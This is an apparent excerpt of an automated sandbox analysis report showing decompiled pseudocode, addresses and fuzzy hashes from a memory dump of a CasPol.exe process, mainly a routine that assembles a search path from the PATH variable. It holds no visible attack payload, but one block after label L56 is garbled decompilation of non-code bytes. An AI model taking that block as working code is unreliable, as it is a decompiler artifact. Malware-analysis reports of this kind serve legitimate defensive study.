                                                                0x0164bb0f

                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0164B9A5
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID:
                                                                • API String ID: 885266447-0
                                                                • Opcode ID: f0c4c707dae90d387b0e92b134bd83a732f42ee7480609525f461d05ca6431f6
                                                                • Instruction ID: 5b457fb3411fa6874a1398c9b420879bef3c9887100fa8fde3fa73108218fd0a
                                                                • Opcode Fuzzy Hash: f0c4c707dae90d387b0e92b134bd83a732f42ee7480609525f461d05ca6431f6
                                                                • Instruction Fuzzy Hash: 83515B71A08341CFC720CF6DC88092ABBFAFB88650F14896EFA9597355D771E844CB92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01652581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 84%
                                                                			E01652581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				intOrPtr _v3;
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t231;
				signed int _t235;
				void* _t236;
				signed int _t238;
				signed int _t245;
				signed int _t247;
				intOrPtr _t249;
				signed int _t252;
				signed int _t259;
				signed int _t262;
				signed int _t270;
				intOrPtr _t276;
				signed int _t278;
				signed int _t280;
				void* _t281;
				void* _t282;
				signed int _t283;
				unsigned int _t286;
				signed int _t290;
				signed int* _t291;
				signed int _t292;
				signed int _t296;
				intOrPtr _t308;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t325;
				void* _t328;
				signed int _t329;
				signed int _t331;
				signed int _t334;
				void* _t335;
				void* _t337;

				_t331 = _t334;
				_t335 = _t334 - 0x4c;
				_v8 =  *0x171d360 ^ _t331;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t324 = 0x171b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t286 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t337 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t276 = 0x48;
				_t306 = 0 | _t337 == 0x00000000;
				_t317 = 0;
				_v37 = _t337 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t276 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t325 = 0xc0000106;
						goto L32;
					} else {
						_t324 = L01644620(_t286,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
						_v52 = _t324;
						__eflags = _t324;
						if(_t324 == 0) {
							_t325 = 0xc0000017;
							goto L32;
						} else {
							 *(_t324 + 0x44) =  *(_t324 + 0x44) & 0x00000000;
							_t50 = _t324 + 0x48; // 0x48
							_t319 = _t50;
							_t306 = _v32;
							 *((intOrPtr*)(_t324 + 0x3c)) = _t276;
							_t278 = 0;
							 *((short*)(_t324 + 0x30)) = _v48;
							__eflags = _t306;
							if(_t306 != 0) {
								 *(_t324 + 0x18) = _t319;
								__eflags = _t306 - 0x1718478;
								 *_t324 = ((0 | _t306 == 0x01718478) - 0x00000001 & 0xfffffffb) + 7;
								E0166F3E0(_t319,  *((intOrPtr*)(_t306 + 4)),  *_t306 & 0x0000ffff);
								_t306 = _v32;
								_t335 = _t335 + 0xc;
								_t278 = 1;
								__eflags = _a8;
								_t319 = _t319 + (( *_t306 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t270 = E016B39F2(_t319);
									_t306 = _v32;
									_t319 = _t270;
								}
							}
							_t290 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t325 = _v68;
								__eflags = 0;
								 *((short*)(_t319 - 2)) = 0;
								goto L32;
							} else {
								_t280 = _t324 + _t278 * 4;
								_v56 = _t280;
								do {
									__eflags = _t306;
									if(_t306 != 0) {
										_t231 =  *(_v60 + _t290 * 4);
										__eflags = _t231;
										if(_t231 == 0) {
											goto L30;
										} else {
											__eflags = _t231 == 5;
											if(_t231 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t280 =  *(_v60 + _t290 * 4);
										 *(_t280 + 0x18) = _t319;
										_t235 =  *(_v60 + _t290 * 4);
										__eflags = _t235 - 8;
										if(_t235 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t235 * 4 +  &M01652959))) {
												case 0:
													__ax =  *0x1718488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0166F3E0(__edi,  *0x171848c, __ax & 0x0000ffff);
														__eax =  *0x1718488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0166F3E0(_t319, _v80, _v64);
													_t265 = _v64;
													goto L26;
												case 2:
													 *0x1718480 & 0x0000ffff = E0166F3E0(__edi,  *0x1718484,  *0x1718480 & 0x0000ffff);
													__eax =  *0x1718480 & 0x0000ffff;
													__eax = ( *0x1718480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0166F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0166F3E0(_t319, _v76, _v36);
														_t265 = _v36;
													}
													L26:
													_t335 = _t335 + 0xc;
													_t319 = _t319 + (_t265 >> 1) * 2 + 2;
													__eflags = _t319;
													L27:
													_push(0x3b);
													_pop(_t267);
													 *((short*)(_t319 - 2)) = _t267;
													goto L28;
												case 6:
													__ebx =  *0x171575c;
													__eflags = __ebx - 0x171575c;
													if(__ebx != 0x171575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0166F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x171575c;
														} while (__ebx != 0x171575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1718478 & 0x0000ffff = E0166F3E0(__edi,  *0x171847c,  *0x1718478 & 0x0000ffff);
													__eax =  *0x1718478 & 0x0000ffff;
													__eax = ( *0x1718478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E016B39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1716e58 & 0x0000ffff = E0166F3E0(__edi,  *0x1716e5c,  *0x1716e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1716e58 & 0x0000ffff;
													__eax = ( *0x1716e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t290 = _v16;
													_t306 = _v32;
													L29:
													_t280 = _t280 + 4;
													__eflags = _t280;
													_v56 = _t280;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t290 = _t290 + 1;
									_v16 = _t290;
									__eflags = _t290 - _v48;
								} while (_t290 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t235 =  *(_v60 + _t317 * 4);
						if(_t235 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t235 * 4 +  &M01652935))) {
							case 0:
								__ax =  *0x1718488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t306 =  &_v64;
								_v80 = E01652E3E(0,  &_v64);
								_t276 = _t276 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1718480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1718480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0163EEF0(0x17179a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0163EB70(__ecx, 0x17179a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t209 = _v72;
											__eflags = _t209;
											if(_t209 != 0) {
												L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
											}
											_t210 = _v52;
											__eflags = _t210;
											if(_t210 != 0) {
												__eflags = _t325;
												if(_t325 < 0) {
													L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t210);
													_t210 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t286 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1717b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0163EB70(__ecx, 0x17179a0);
										__eax = _v52;
										L36:
										_pop(_t318);
										_pop(_t326);
										__eflags = _v8 ^ _t331;
										_pop(_t277);
										return E0166B640(_t210, _t277, _v8 ^ _t331, _t306, _t318, _t326);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t272 = _v56;
								if(_v56 != 0) {
									_t306 =  &_v36;
									_t274 = E01652E3E(_t272,  &_v36);
									_t286 = _v36;
									_v76 = _t274;
								}
								if(_t286 == 0) {
									goto L44;
								} else {
									_t276 = _t276 + 2 + _t286;
								}
								goto L14;
							case 6:
								__eax =  *0x1715764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1718478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1718478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1716e58 & 0x0000ffff;
								__eax = ( *0x1716e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t317 = _t317 + 1;
								if(_t317 >= _v48) {
									goto L16;
								} else {
									_t306 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t291 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *[gs:esi+0x28] =  *[gs:esi+0x28] + _t335;
					_t236 = _t235 + _t335;
					asm("daa");
					 *[gs:esi] =  *[gs:esi] + _t331;
					 *[gs:esi+0x28] =  *[gs:esi+0x28] + _t236;
					 *[gs:0x1f016526] =  *[gs:0x1f016526] + _t236;
					_pop(_t281);
					_t238 =  *_t291 * 0x01652894 ^ 0x0201695b;
					_v3 = _v3 - _t335;
					 *_t238 =  *_t238 - 0x65;
					asm("daa");
					 *[gs:esi] =  *[gs:esi] + _t281;
					_v3 = _v3 - _t238;
					_t328 = _t324 + _t324 - 1;
					_v3 = _v3 - _t238;
					asm("daa");
					_pop(_t282);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x16fff00);
					E0167D08C(_t282, _t319, _t328);
					_v44 =  *[fs:0x18];
					_t320 = 0;
					 *_a24 = 0;
					_t283 = _a12;
					__eflags = _t283;
					if(_t283 == 0) {
						_t245 = 0xc0000100;
					} else {
						_v8 = 0;
						_t329 = 0xc0000100;
						_v52 = 0xc0000100;
						_t247 = 4;
						while(1) {
							_v40 = _t247;
							__eflags = _t247;
							if(_t247 == 0) {
								break;
							}
							_t296 = _t247 * 0xc;
							_v48 = _t296;
							__eflags = _t283 -  *((intOrPtr*)(_t296 + 0x1601664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t262 = E0166E5C0(_a8,  *((intOrPtr*)(_t296 + 0x1601668)), _t283);
									_t335 = _t335 + 0xc;
									__eflags = _t262;
									if(__eflags == 0) {
										_t329 = E016A51BE(_t283,  *((intOrPtr*)(_v48 + 0x160166c)), _a16, _t320, _t329, __eflags, _a20, _a24);
										_v52 = _t329;
										break;
									} else {
										_t247 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t247 = _t247 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t329;
						__eflags = _t329;
						if(_t329 < 0) {
							__eflags = _t329 - 0xc0000100;
							if(_t329 == 0xc0000100) {
								_t292 = _a4;
								__eflags = _t292;
								if(_t292 != 0) {
									_v36 = _t292;
									__eflags =  *_t292 - _t320;
									if( *_t292 == _t320) {
										_t329 = 0xc0000100;
										goto L76;
									} else {
										_t308 =  *((intOrPtr*)(_v44 + 0x30));
										_t249 =  *((intOrPtr*)(_t308 + 0x10));
										__eflags =  *((intOrPtr*)(_t249 + 0x48)) - _t292;
										if( *((intOrPtr*)(_t249 + 0x48)) == _t292) {
											__eflags =  *(_t308 + 0x1c);
											if( *(_t308 + 0x1c) == 0) {
												L106:
												_t329 = E01652AE4( &_v36, _a8, _t283, _a16, _a20, _a24);
												_v32 = _t329;
												__eflags = _t329 - 0xc0000100;
												if(_t329 != 0xc0000100) {
													goto L69;
												} else {
													_t320 = 1;
													_t292 = _v36;
													goto L75;
												}
											} else {
												_t252 = E01636600( *(_t308 + 0x1c));
												__eflags = _t252;
												if(_t252 != 0) {
													goto L106;
												} else {
													_t292 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t329 = E01652C50(_t292, _a8, _t283, _a16, _a20, _a24, _t320);
											L76:
											_v32 = _t329;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0163EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t329 = _a24;
									_t259 = E01652AE4( &_v36, _a8, _t283, _a16, _a20, _t329);
									_v32 = _t259;
									__eflags = _t259 - 0xc0000100;
									if(_t259 == 0xc0000100) {
										_v32 = E01652C50(_v36, _a8, _t283, _a16, _a20, _t329, 1);
									}
									_v8 = _t320;
									E01652ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t245 = _t329;
					}
					L70:
					return E0167D0D1(_t245);
				}
				L108:
			}
























































                                                                0x01652584
                                                                0x01652586
                                                                0x01652590
                                                                0x01652596
                                                                0x01652597
                                                                0x01652598
                                                                0x01652599
                                                                0x0165259e
                                                                0x016525a4
                                                                0x016525a9
                                                                0x016525ac
                                                                0x016525ae
                                                                0x016525b1
                                                                0x016525b2
                                                                0x016525b5
                                                                0x016525b8
                                                                0x016525bb
                                                                0x016525bc
                                                                0x016525bf
                                                                0x016525c2
                                                                0x016525c5
                                                                0x016525c6
                                                                0x016525cb
                                                                0x016525ce
                                                                0x016525d8
                                                                0x016525db
                                                                0x016525dd
                                                                0x016525de
                                                                0x016525e1
                                                                0x016525e3
                                                                0x016525e9
                                                                0x016526da
                                                                0x016526da
                                                                0x016526dd
                                                                0x016526e2
                                                                0x01695b56
                                                                0x00000000
                                                                0x016526e8
                                                                0x016526f9
                                                                0x016526fb
                                                                0x016526fe
                                                                0x01652700
                                                                0x01695b60
                                                                0x00000000
                                                                0x01652706
                                                                0x01652706
                                                                0x0165270a
                                                                0x0165270a
                                                                0x0165270d
                                                                0x01652713
                                                                0x01652716
                                                                0x01652718
                                                                0x0165271c
                                                                0x0165271e
                                                                0x01695b6c
                                                                0x01695b6f
                                                                0x01695b7f
                                                                0x01695b89
                                                                0x01695b8e
                                                                0x01695b93
                                                                0x01695b96
                                                                0x01695b9c
                                                                0x01695ba0
                                                                0x01695ba3
                                                                0x01695bab
                                                                0x01695bb0
                                                                0x01695bb3
                                                                0x01695bb3
                                                                0x01695ba3
                                                                0x01652724
                                                                0x01652726
                                                                0x01652729
                                                                0x0165272c
                                                                0x0165279d
                                                                0x0165279d
                                                                0x016527a0
                                                                0x016527a2
                                                                0x00000000
                                                                0x0165272e
                                                                0x0165272e
                                                                0x01652731
                                                                0x01652734
                                                                0x01652734
                                                                0x01652736
                                                                0x01695bc1
                                                                0x01695bc1
                                                                0x01695bc4
                                                                0x00000000
                                                                0x01695bca
                                                                0x01695bca
                                                                0x01695bcd
                                                                0x00000000
                                                                0x01695bd3
                                                                0x00000000
                                                                0x01695bd3
                                                                0x01695bcd
                                                                0x0165273c
                                                                0x0165273c
                                                                0x01652742
                                                                0x01652747
                                                                0x0165274a
                                                                0x0165274d
                                                                0x01652750
                                                                0x00000000
                                                                0x01652756
                                                                0x01652756
                                                                0x00000000
                                                                0x01652902
                                                                0x01652908
                                                                0x0165290b
                                                                0x00000000
                                                                0x01652911
                                                                0x0165291c
                                                                0x01652921
                                                                0x00000000
                                                                0x01652921
                                                                0x00000000
                                                                0x00000000
                                                                0x01652880
                                                                0x01652887
                                                                0x0165288c
                                                                0x00000000
                                                                0x00000000
                                                                0x01652805
                                                                0x0165280a
                                                                0x01652814
                                                                0x01652816
                                                                0x00000000
                                                                0x00000000
                                                                0x0165281e
                                                                0x01652821
                                                                0x01652823
                                                                0x00000000
                                                                0x01652829
                                                                0x01652829
                                                                0x01652831
                                                                0x0165283c
                                                                0x0165283e
                                                                0x00000000
                                                                0x0165283e
                                                                0x00000000
                                                                0x00000000
                                                                0x0165284e
                                                                0x01652850
                                                                0x01652851
                                                                0x01652854
                                                                0x01652857
                                                                0x0165285a
                                                                0x0165285c
                                                                0x0165285d
                                                                0x00000000
                                                                0x00000000
                                                                0x0165275d
                                                                0x01652761
                                                                0x00000000
                                                                0x01652767
                                                                0x0165276e
                                                                0x01652773
                                                                0x01652773
                                                                0x01652776
                                                                0x01652778
                                                                0x0165277e
                                                                0x0165277e
                                                                0x01652781
                                                                0x01652781
                                                                0x01652783
                                                                0x01652784
                                                                0x00000000
                                                                0x00000000
                                                                0x01695bd8
                                                                0x01695bde
                                                                0x01695be4
                                                                0x01695be6
                                                                0x01695be8
                                                                0x01695be9
                                                                0x01695bee
                                                                0x01695bf8
                                                                0x01695bff
                                                                0x01695c01
                                                                0x01695c04
                                                                0x01695c07
                                                                0x01695c0b
                                                                0x01695c0d
                                                                0x01695c0d
                                                                0x01695c15
                                                                0x01695c18
                                                                0x01695c1b
                                                                0x01695c1b
                                                                0x01695c1e
                                                                0x00000000
                                                                0x00000000
                                                                0x016528c3
                                                                0x016528c8
                                                                0x016528d2
                                                                0x016528d4
                                                                0x016528d8
                                                                0x016528db
                                                                0x01695c26
                                                                0x01695c28
                                                                0x01695c2d
                                                                0x01695c2d
                                                                0x00000000
                                                                0x00000000
                                                                0x01695c34
                                                                0x01695c36
                                                                0x01695c49
                                                                0x01695c4e
                                                                0x01695c54
                                                                0x01695c5b
                                                                0x01695c5d
                                                                0x01695c60
                                                                0x01652788
                                                                0x01652788
                                                                0x0165278b
                                                                0x0165278e
                                                                0x0165278e
                                                                0x0165278e
                                                                0x01652791
                                                                0x00000000
                                                                0x00000000
                                                                0x01652756
                                                                0x01652750
                                                                0x00000000
                                                                0x01652794
                                                                0x01652794
                                                                0x01652795
                                                                0x01652798
                                                                0x01652798
                                                                0x00000000
                                                                0x01652734
                                                                0x0165272c
                                                                0x01652700
                                                                0x016525ef
                                                                0x016525ef
                                                                0x016525ef
                                                                0x016525f2
                                                                0x016525f8
                                                                0x00000000
                                                                0x00000000
                                                                0x016525fe
                                                                0x00000000
                                                                0x016528e6
                                                                0x016528ec
                                                                0x016528ef
                                                                0x016528f5
                                                                0x016528f8
                                                                0x016528f8
                                                                0x00000000
                                                                0x016528f8
                                                                0x00000000
                                                                0x00000000
                                                                0x01652866
                                                                0x01652866
                                                                0x01652876
                                                                0x01652879
                                                                0x00000000
                                                                0x00000000
                                                                0x016527e0
                                                                0x016527e7
                                                                0x016527e9
                                                                0x016527eb
                                                                0x01695afd
                                                                0x00000000
                                                                0x01695afd
                                                                0x00000000
                                                                0x00000000
                                                                0x01652633
                                                                0x01652638
                                                                0x0165263b
                                                                0x0165263c
                                                                0x0165263e
                                                                0x01652640
                                                                0x01652642
                                                                0x01652647
                                                                0x01652649
                                                                0x0165264e
                                                                0x01652650
                                                                0x01652653
                                                                0x01652659
                                                                0x016526a2
                                                                0x016526a7
                                                                0x016526ac
                                                                0x016526b2
                                                                0x01695b11
                                                                0x01695b15
                                                                0x01695b17
                                                                0x00000000
                                                                0x016526b8
                                                                0x016526b8
                                                                0x016526ba
                                                                0x016527a6
                                                                0x016527a6
                                                                0x016527a9
                                                                0x016527ab
                                                                0x016527b9
                                                                0x016527b9
                                                                0x016527be
                                                                0x016527c1
                                                                0x016527c3
                                                                0x016527c5
                                                                0x016527c7
                                                                0x01695c74
                                                                0x01695c79
                                                                0x01695c79
                                                                0x016527c7
                                                                0x00000000
                                                                0x016526c0
                                                                0x016526c0
                                                                0x016526c3
                                                                0x016526c6
                                                                0x016526c6
                                                                0x016526c9
                                                                0x016526c9
                                                                0x00000000
                                                                0x016526c9
                                                                0x016526ba
                                                                0x0165265b
                                                                0x0165265b
                                                                0x0165265e
                                                                0x01652667
                                                                0x0165266d
                                                                0x01652677
                                                                0x0165267c
                                                                0x0165267f
                                                                0x01652681
                                                                0x01695b49
                                                                0x01695b4e
                                                                0x016527cd
                                                                0x016527d0
                                                                0x016527d1
                                                                0x016527d2
                                                                0x016527d4
                                                                0x016527dd
                                                                0x01652687
                                                                0x01652687
                                                                0x0165268a
                                                                0x0165268b
                                                                0x0165268e
                                                                0x0165268f
                                                                0x01652691
                                                                0x01652696
                                                                0x01652698
                                                                0x0165269d
                                                                0x0165269f
                                                                0x00000000
                                                                0x0165269f
                                                                0x01652681
                                                                0x00000000
                                                                0x00000000
                                                                0x01652846
                                                                0x00000000
                                                                0x00000000
                                                                0x01652605
                                                                0x0165260a
                                                                0x0165260c
                                                                0x01652611
                                                                0x01652616
                                                                0x01652619
                                                                0x01652619
                                                                0x0165261e
                                                                0x00000000
                                                                0x01652624
                                                                0x01652627
                                                                0x01652627
                                                                0x00000000
                                                                0x00000000
                                                                0x01695b1f
                                                                0x00000000
                                                                0x00000000
                                                                0x01652894
                                                                0x0165289b
                                                                0x0165289d
                                                                0x016528a1
                                                                0x01695b2b
                                                                0x01695b2e
                                                                0x01695b2e
                                                                0x016528a7
                                                                0x016528a9
                                                                0x01695b04
                                                                0x01695b09
                                                                0x01695b09
                                                                0x01695b09
                                                                0x00000000
                                                                0x00000000
                                                                0x01695b35
                                                                0x01695b3c
                                                                0x016528fb
                                                                0x016528fb
                                                                0x016526cc
                                                                0x016526cc
                                                                0x016526d0
                                                                0x00000000
                                                                0x016526d2
                                                                0x016526d2
                                                                0x00000000
                                                                0x016526d2
                                                                0x00000000
                                                                0x00000000
                                                                0x016525fe
                                                                0x0165292d
                                                                0x0165292f
                                                                0x01652930
                                                                0x01652935
                                                                0x01652937
                                                                0x0165293b
                                                                0x0165293e
                                                                0x0165293f
                                                                0x01652942
                                                                0x01652947
                                                                0x0165294e
                                                                0x01652955
                                                                0x0165295a
                                                                0x0165295d
                                                                0x01652962
                                                                0x01652963
                                                                0x01652966
                                                                0x01652969
                                                                0x0165296a
                                                                0x0165296e
                                                                0x01652972
                                                                0x01652981
                                                                0x01652982
                                                                0x01652983
                                                                0x01652984
                                                                0x01652985
                                                                0x01652986
                                                                0x01652987
                                                                0x01652988
                                                                0x01652989
                                                                0x0165298a
                                                                0x0165298b
                                                                0x0165298c
                                                                0x0165298d
                                                                0x0165298e
                                                                0x0165298f
                                                                0x01652990
                                                                0x01652992
                                                                0x01652997
                                                                0x016529a3
                                                                0x016529a6
                                                                0x016529ab
                                                                0x016529ad
                                                                0x016529b0
                                                                0x016529b2
                                                                0x01695c80
                                                                0x016529b8
                                                                0x016529b8
                                                                0x016529bb
                                                                0x016529c0
                                                                0x016529c5
                                                                0x016529c6
                                                                0x016529c6
                                                                0x016529c9
                                                                0x016529cb
                                                                0x00000000
                                                                0x00000000
                                                                0x016529cd
                                                                0x016529d0
                                                                0x016529d9
                                                                0x016529db
                                                                0x016529dd
                                                                0x01652a7f
                                                                0x01652a84
                                                                0x01652a87
                                                                0x01652a89
                                                                0x01695ca1
                                                                0x01695ca3
                                                                0x00000000
                                                                0x01652a8f
                                                                0x01652a8f
                                                                0x00000000
                                                                0x01652a8f
                                                                0x00000000
                                                                0x016529e3
                                                                0x016529e3
                                                                0x016529e3
                                                                0x00000000
                                                                0x016529e3
                                                                0x016529dd
                                                                0x00000000
                                                                0x016529db
                                                                0x016529e6
                                                                0x016529e9
                                                                0x016529eb
                                                                0x016529ed
                                                                0x016529f3
                                                                0x016529f5
                                                                0x016529f8
                                                                0x016529fa
                                                                0x01652a97
                                                                0x01652a9a
                                                                0x01652a9d
                                                                0x01652add
                                                                0x00000000
                                                                0x01652a9f
                                                                0x01652aa2
                                                                0x01652aa5
                                                                0x01652aa8
                                                                0x01652aab
                                                                0x01695cab
                                                                0x01695caf
                                                                0x01695cc5
                                                                0x01695cda
                                                                0x01695cdc
                                                                0x01695cdf
                                                                0x01695ce5
                                                                0x00000000
                                                                0x01695ceb
                                                                0x01695ced
                                                                0x01695cee
                                                                0x00000000
                                                                0x01695cee
                                                                0x01695cb1
                                                                0x01695cb4
                                                                0x01695cb9
                                                                0x01695cbb
                                                                0x00000000
                                                                0x01695cbd
                                                                0x01695cbd
                                                                0x00000000
                                                                0x01695cbd
                                                                0x01695cbb
                                                                0x01652ab1
                                                                0x01652ab1
                                                                0x01652ac4
                                                                0x01652ac6
                                                                0x01652ac6
                                                                0x00000000
                                                                0x01652ac6
                                                                0x01652aab
                                                                0x00000000
                                                                0x01652a00
                                                                0x01652a09
                                                                0x01652a0e
                                                                0x01652a21
                                                                0x01652a24
                                                                0x01652a35
                                                                0x01652a3a
                                                                0x01652a3d
                                                                0x01652a42
                                                                0x01652a59
                                                                0x01652a59
                                                                0x01652a5c
                                                                0x01652a5f
                                                                0x01652a5f
                                                                0x016529fa
                                                                0x016529f3
                                                                0x01652a64
                                                                0x01652a64
                                                                0x01652a6b
                                                                0x01652a6b
                                                                0x01652a6d
                                                                0x01652a72
                                                                0x01652a72
                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PATH
                                                                • API String ID: 0-1036084923
                                                                • Opcode ID: 0d6c06bb376d882a6e0c1084f0995554ac257d80c4fa305479100c461469e921
                                                                • Instruction ID: dbf957dfdca679d70d0a6deac8c28a015ac42d0d8023ba950da50cf84d3bcaf5
                                                                • Opcode Fuzzy Hash: 0d6c06bb376d882a6e0c1084f0995554ac257d80c4fa305479100c461469e921
                                                                • Instruction Fuzzy Hash: CCC15AB1E00219DBDB65DF99DCA1ABEBBB5FF58710F04402DE901AB350DB34A942CB64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 80%
                                                                			E0165FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
